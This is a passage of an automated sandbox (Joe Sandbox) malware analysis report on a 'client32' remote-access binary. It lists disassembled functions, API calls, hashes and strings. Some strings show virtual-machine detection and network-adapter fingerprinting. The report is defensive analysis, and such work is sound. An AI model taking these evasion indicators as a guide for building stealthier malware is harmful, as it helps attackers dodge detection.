                                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 69D00FF6
                                                                                                • GetProcAddress.KERNEL32(00000000,ntohl), ref: 69D0100C
                                                                                                • _malloc.LIBCMT ref: 69D01020
                                                                                                • _free.LIBCMT ref: 69D010E5
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69D010FA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$Load_free$AdaptersAddressesFree_malloc
                                                                                                • String ID: ntohl$ws2_32.dll
                                                                                                • API String ID: 4086026317-4165132517
                                                                                                • Opcode ID: 1c6b6f1a2cf23186498a40c764aec1eb0983e4af217201f16deb5795c20ed5a1
                                                                                                • Instruction ID: f38377cc2fb1ccd726b35c41f6a1ef07864372e2d235709c7a158fb9e030831f
                                                                                                • Opcode Fuzzy Hash: 1c6b6f1a2cf23186498a40c764aec1eb0983e4af217201f16deb5795c20ed5a1
                                                                                                • Instruction Fuzzy Hash: 6F4161B59042599BDB24DF24CD6079A73F9BF45348F10C4B9D989A3640EF359A84CFE0
                                                                                                Function 69CE7EF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE7F26
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE7FF9
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE8047
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE8052
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE806A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$_memset
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 920729587-4141403093
                                                                                                • Opcode ID: 939b1689dd7e48ed6ea0925dbfe9f4e55830af6f0ec3794d82d763e4d8249999
                                                                                                • Instruction ID: fac3be4e6335cf1b91f8ecf75f0913b75626b986ad5e7d7f57672fc89ef9f7ac
                                                                                                • Opcode Fuzzy Hash: 939b1689dd7e48ed6ea0925dbfe9f4e55830af6f0ec3794d82d763e4d8249999
                                                                                                • Instruction Fuzzy Hash: 914193B4C002099FEF10DF60ED41BAEBAB4EF05308F009075DA0AE6641F7759A54DBB5
                                                                                                Function 110935A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                                  • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$qu
                                                                                                • API String ID: 3136964118-4145319076
                                                                                                • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                                • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                                • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                                • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                                Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowPlacement.USER32(00000000,0000002C), ref: 110B9594
                                                                                                • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001), ref: 110B9606
                                                                                                • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                                • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                                • API String ID: 1092798621-1973987134
                                                                                                • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                                • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                                                • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                                • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                                                Function 69CE1000 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CE102B
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc
                                                                                                • String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$VUUU$base64.cpp$cchOut >= cchWorst$pszOut
                                                                                                • API String ID: 501242067-340907830
                                                                                                • Opcode ID: 1dd03af750852de9ff0a2a21ac37f80e1bdde46f08901f76b3f134f943c94301
                                                                                                • Instruction ID: 6ea1e22a1ac1574560e1902c9cf16f2035d5e71a829c8a085df0c42a9b3aea3d
                                                                                                • Opcode Fuzzy Hash: 1dd03af750852de9ff0a2a21ac37f80e1bdde46f08901f76b3f134f943c94301
                                                                                                • Instruction Fuzzy Hash: 57318D739092989BC700CF6D9811789BBB1AFA1228F0D81B6ED45DB341F239EE16C750
                                                                                                Function 69CE7C60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE7C8D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D18
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D68
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D6F
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$_memset
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 920729587-4141403093
                                                                                                • Opcode ID: 1ac38a99c2f78d83685c8e1876ff0154244ad8f65a7ceecfe795d9dfe2b5b223
                                                                                                • Instruction ID: f354fa491f3eb4342ac487770dbc6c2d18b568fa4e353034a7ff4000a5ebeff6
                                                                                                • Opcode Fuzzy Hash: 1ac38a99c2f78d83685c8e1876ff0154244ad8f65a7ceecfe795d9dfe2b5b223
                                                                                                • Instruction Fuzzy Hash: 7031B2B1D002099FEB10DF64D841BAEBBF4EF49304F108079D609E7641EB759A45CBB1
                                                                                                Function 69CFBB40 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
                                                                                                • API String ID: 4104443479-3492528137
                                                                                                • Opcode ID: 5a80230347f2b6c2f6b3738a659a22ce5a1d60c978327edf4b7269a20da4fd5a
                                                                                                • Instruction ID: 8c0ebb2ba2c1af959f414cb5adc25e269ec3da865a92b51d39954698fb716e1b
                                                                                                • Opcode Fuzzy Hash: 5a80230347f2b6c2f6b3738a659a22ce5a1d60c978327edf4b7269a20da4fd5a
                                                                                                • Instruction Fuzzy Hash: 6321F4B86206026FD70CDF58FD91E1E33549F9831CB508078FB5D6B685FB22AD0B46A2
                                                                                                Function 69CFBD90 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 90COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: IsA()$NSMString.cpp$iAt<=m_nLength$iAt>=0$pszStr!=NULL
                                                                                                • API String ID: 4104443479-3876480746
                                                                                                • Opcode ID: e94a04465525ff8ca073805787091868301d71c63fd1f94748943c6868691ea0
                                                                                                • Instruction ID: f67ac7a97da46b40af1dcb37c12e90428fe14bfe215686e5b50423b15fa6e3e2
                                                                                                • Opcode Fuzzy Hash: e94a04465525ff8ca073805787091868301d71c63fd1f94748943c6868691ea0
                                                                                                • Instruction Fuzzy Hash: 132134B96106013BE748DB15BC80DAFB364AF8436CB458034FF5C6BA05FB20AD0B42E2
                                                                                                Function 69CF7D50 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _sprintf
                                                                                                • String ID: %02X%02X%02X%02X%02X%02X$0000000000$02004C4F4F50$VIRTNET$VMware$Virtual
                                                                                                • API String ID: 1467051239-555777999
                                                                                                • Opcode ID: c8fa883011c2831c4f07aec2f98ca639316021cd5230c25c1e85ad384d4436bd
                                                                                                • Instruction ID: 909405d7fd9ac1ab08974f924cd541144b006df3031602ccc78395e751a6cb58
                                                                                                • Opcode Fuzzy Hash: c8fa883011c2831c4f07aec2f98ca639316021cd5230c25c1e85ad384d4436bd
                                                                                                • Instruction Fuzzy Hash: C221E5B59042086ADB14CBB49C30FFA77F85F5520EF8085A8FA8D93544FA35A609DB70
                                                                                                Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 1108132F
                                                                                                • _memset.LIBCMT ref: 11081318
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                                • API String ID: 75970324-4264523126
                                                                                                • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                                • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                                Function 69D00BB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 69D00BB8
                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 69D00BCB
                                                                                                • _malloc.LIBCMT ref: 69D00BF3
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _free.LIBCMT ref: 69D00BEB
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69D00C10
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                • String ID: GetAdaptersInfo$IPHLPAPI.DLL
                                                                                                • API String ID: 1157017740-2359281783
                                                                                                • Opcode ID: 62537afe8b21d2e6ba78bb9120013e618afbcdaf8c00ee52cc42b48f8f95ccbc
                                                                                                • Instruction ID: d59a73effd7e95a31a3462b27bf42c61cff5cf00c2bb2ab5bd8d1e28279334ff
                                                                                                • Opcode Fuzzy Hash: 62537afe8b21d2e6ba78bb9120013e618afbcdaf8c00ee52cc42b48f8f95ccbc
                                                                                                • Instruction Fuzzy Hash: CBF0A4B6500341AFE6249F75DDA4E0B76ECAF46648700883CE656C7D00EB35E445C734
                                                                                                Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
